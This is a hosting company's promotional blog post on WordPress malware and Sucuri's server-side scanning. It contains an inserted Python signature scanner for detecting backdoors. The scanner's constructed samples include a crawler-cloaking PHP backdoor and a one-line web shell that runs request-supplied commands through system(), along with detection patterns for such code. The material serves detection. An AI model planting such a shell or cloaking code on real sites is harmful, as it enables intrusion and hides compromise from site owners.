WordPress Security: The Problem, The Solution, and The Immediate Action You Should Take

Imagine that you are in the market for a new home security system. Something more than just a buzzer on a 90-second delay.

You do your research and you find two general options:

The first option, offered by the majority of the home security providers you look into, pledges to send specialized teams to your house every time you’re gone, to attempt to break in.

When you return home, they provide you with a detailed report of the vulnerabilities they found – a loose window here, an unlocked back door there – and they leave without fixing them. You have no real way of knowing if any unwanted guests came in after they left.

The second option, offered by far fewer providers, actually has a database of all known thieves that includes their signature modes of entry and what they’re likely to take.

In addition to using this database to check your house for vulnerabilities and breaches, this provider also checks each room of the house one by one to let you know if it’s safe to re-enter the house when you arrive home.

Which one would you choose?

Assuming the cost of the second provider is not exorbitant – which it’s not – of course you’d choose the second option. If it’s your family’s safety at stake, a few extra bucks is well worth it, in exchange for peace of mind.

The Problem: Malware

So here’s an understatement for you: malware is a big problem on the web.

It’s a big problem for you, the website owner, because every second your site is online is another second it’s at risk of being hacked.

And it’s a particularly huge, keep-you-up-at-night problem for us because it is our job to protect your site from these threats.

We want all of our servers and all of our customers’ WordPress sites to be safe and protected, but the threat is not a static one nor does it ever go away. This is why security on the web requires constant vigilance, the ability to be nimble, and a humble commitment to perpetual improvement.

Sites end up on our doorstep every day that have been severely hacked. It could be risky business for us to invite problems like these into our house here at Synthesis.

But it’s not, because we’re confident in our approach and in the solutions we have in place to not only de-hack a WordPress website, but also to keep it clean in the future.

We rely on a multifaceted approach to security that includes:

Minimalistic, locked-down server configurations

In-house injection blocking software

Strong relationships with security specialists like Sucuri

The importance of this last bullet cannot be overstated.

Another problem is that there are a plethora of companies who say they provide external security scanning services. But in reality, few do it well … if they really do anything at all.

Many simply just do the equivalent of Option #1 in our example above: throw a bunch of injection strings at your site and provide you with a report about what they feel is a vulnerability.

You can understand why your back door being unlocked is a problem when it comes to home security. And you can easily fix it. But you have to be a computer scientist to really make sense of whatever vulnerability report gets spat out to you.

Furthermore, those who actually scan for malware are limited by their malware database: a scanner can only recognize what it has a signature for. This criterion alone led us to Sucuri over a year ago. We were impressed not only by the sophistication of their signature database but also by their efforts to keep it up to date.

Still, hackers are not idiots. Quite the contrary. Some of the brightest and most capable minds using the web right now are, unfortunately, doing so for selfish and nefarious purposes. So there are limitations to external scanners.

For example, if you are an HVAC company and your site gets hacked, you will likely find out from a local customer who gets a browser warning about malware. Conditional malware can be sophisticated enough to show itself only to visitors from certain geographies, based on their IP address, while serving a clean page to everyone else.

Yeah. Serious stuff.

Even worse, hackers know how to hide their malware from external scanners and even from Googlebot, for example by checking the visitor’s User-Agent or IP address and serving a clean page to crawlers, so the infection is never seen from the outside.

But we don’t dwell on problems here at Synthesis. We seek solutions. And in Sucuri, we’ve found a partner that provides exactly the kind of solution that can help combat even the most advanced attacks.

The Solution: Server-Side Scanning

Server-side scanning like Sucuri’s involves placing a small file on the server that lets their scanners check the site’s files on disk against their signature base, rather than only inspecting the pages the site serves over HTTP.

An added bonus: Sucuri does the lifting, and it is not resource intensive on the server.

At Synthesis, we actually use two of these services, one being Sucuri’s. We run it every 4-6 hours and then take action based on the results.
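To make the difference between HTTP scanning and server-side scanning concrete, here is an added example, not code from Sucuri or Synthesis. It walks a WordPress file tree on disk and flags files by their content, so a backdoor that returns early for Googlebot or a scanner User-Agent (the cloaking described above) is still found because the file itself is inspected. The signatures, the directory layout and the sample files are constructed for this example; the sample backdoor is written to a temporary directory and never executed, and its payload decodes to a harmless echo.

```python
"""Server-side signature scan of a WordPress file tree (added example).

Walks the site's directories on disk and flags files by content, so a
backdoor that cloaks itself from crawlers and HTTP scanners is still found.
The signatures and sample files below are constructed for this example;
they are not Sucuri's database or Synthesis's tooling.
"""
import os
import re
import tempfile
from pathlib import Path

# Constructed signatures for common PHP backdoor idioms.
SIGNATURES = {
    # eval() over an obfuscated payload: eval(base64_decode(...)), eval(gzinflate(...))
    "eval-of-decoded-payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # executing attacker-supplied request data directly
    "request-data-execution": re.compile(
        r"\b(?:eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    # branching on the crawler/scanner User-Agent is the cloaking the post describes
    "crawler-cloaking": re.compile(
        r"HTTP_USER_AGENT.{0,300}?(?:googlebot|bingbot|sucuri)", re.I | re.S),
}
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.I)
UPLOADS_DIR = Path("wp-content") / "uploads"


def scan_tree(root):
    """Return sorted (relative_path, rule) findings for every file under root."""
    root = Path(root)
    findings = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            rel = path.relative_to(root)
            try:
                text = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            has_php = bool(PHP_OPEN_TAG.search(text))
            if not has_php:
                continue
            # uploads should hold media only; executable PHP there is a red flag
            if rel.parts[:2] == UPLOADS_DIR.parts:
                findings.add((rel.as_posix(), "php-in-uploads"))
            for rule, pattern in SIGNATURES.items():
                if pattern.search(text):
                    findings.add((rel.as_posix(), rule))
    return sorted(findings)


# Constructed sample: an inert cloaked backdoor. It returns the normal page to
# crawlers and scanners, so an HTTP-only scan sees nothing wrong.
CLOAKED_BACKDOOR = """<?php
// Serve the normal page to crawlers and scanners; run the payload for real visitors.
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if (stripos($ua, 'googlebot') !== false || stripos($ua, 'sucuri') !== false) {
    return;
}
eval(base64_decode('ZWNobyAnaGVsbG8nOw=='));  // decodes to: echo 'hello';
"""

# Constructed sample site: two clean PHP files, one media file, two infected files.
SAMPLE_FILES = {
    "wp-includes/functions.php": "<?php\nfunction wp_hello() { return 'hello'; }\n",
    "wp-content/themes/genesis/functions.php": "<?php\nadd_action('init', 'wp_hello');\n",
    "wp-content/themes/genesis/footer.php": CLOAKED_BACKDOOR,
    "wp-content/uploads/2013/02/.cache.php": "<?php if (isset($_REQUEST['c'])) { system($_REQUEST['c']); }\n",
    "wp-content/uploads/2013/02/photo.jpg": "\xff\xd8\xff\xe0 not a real jpeg, but no PHP tag\n",
}


def build_sample_site(root):
    """Write the constructed sample files under root."""
    for rel, body in SAMPLE_FILES.items():
        path = Path(root) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body, encoding="utf-8")


def demo():
    """Build the sample site in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for path, rule in demo():
        print(f"{rule:26} {path}")
```

The scan flags the cloaked footer.php twice (obfuscated eval and crawler cloaking) and the file in uploads twice (PHP where only media belongs, and a shell command fed from request data), while the two clean PHP files and the image produce nothing. A real scanner like Sucuri’s uses a far larger, maintained signature set, which is exactly why the database and its upkeep matter.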

In Sucuri’s own words:

Web-malware continues to evolve, making it challenging to detect using only HTTP fingerprinting techniques, such as the ones SiteCheck is restricted to. As such, we have been working to develop a new method of scanning that allows us to better detect infections on the server and site directories, specifically backdoors that are causing and acting as entry points to the infections.

The feature was designed to complement existing scanning capabilities, improving the rate of detection such that we can more quickly detect issues before the blacklisting authorities (i.e., Google, Bing, Norton, AVG, etc.) get the chance to impact your online reputation.

Sounds pretty great, right?

And it is. But it’s not a solution in and of itself.

Even with server-side scanners, someone has to check the results and then get rid of malware if your site is infected.

Dre Armeda, one of the co-founders of Sucuri, explained that they do not believe in 100% automation for clean-ups. They have great tools and processes, but they also assign a security engineer to every remediation case.

“It’s important to have that oversight when dealing with folks that are in a vulnerable position,” Armeda explained.

If you run a non-WordPress website, or if you have a WordPress site but choose to host elsewhere, you can go direct with Sucuri. We highly recommend it.

And if you are not a current customer, but performance and security are important to you, I’d suggest you decide which of our hosting plans is right for you. Sign up. We’ll help you get your site cleaned up during your migration so you get a fresh start when it comes to security.

Then you’ll have peace of mind knowing someone is going through your website every day, either giving the “All clear!” or fixing it until we can.

About the author

Jerod Morris

I love words. I write for Copyblogger and oversee the marketing for Synthesis. You're likely to run across me at some point in the Help Desk too, because I love getting in and interacting with our great customers. Say hi there, and let's connect on Twitter and G+.
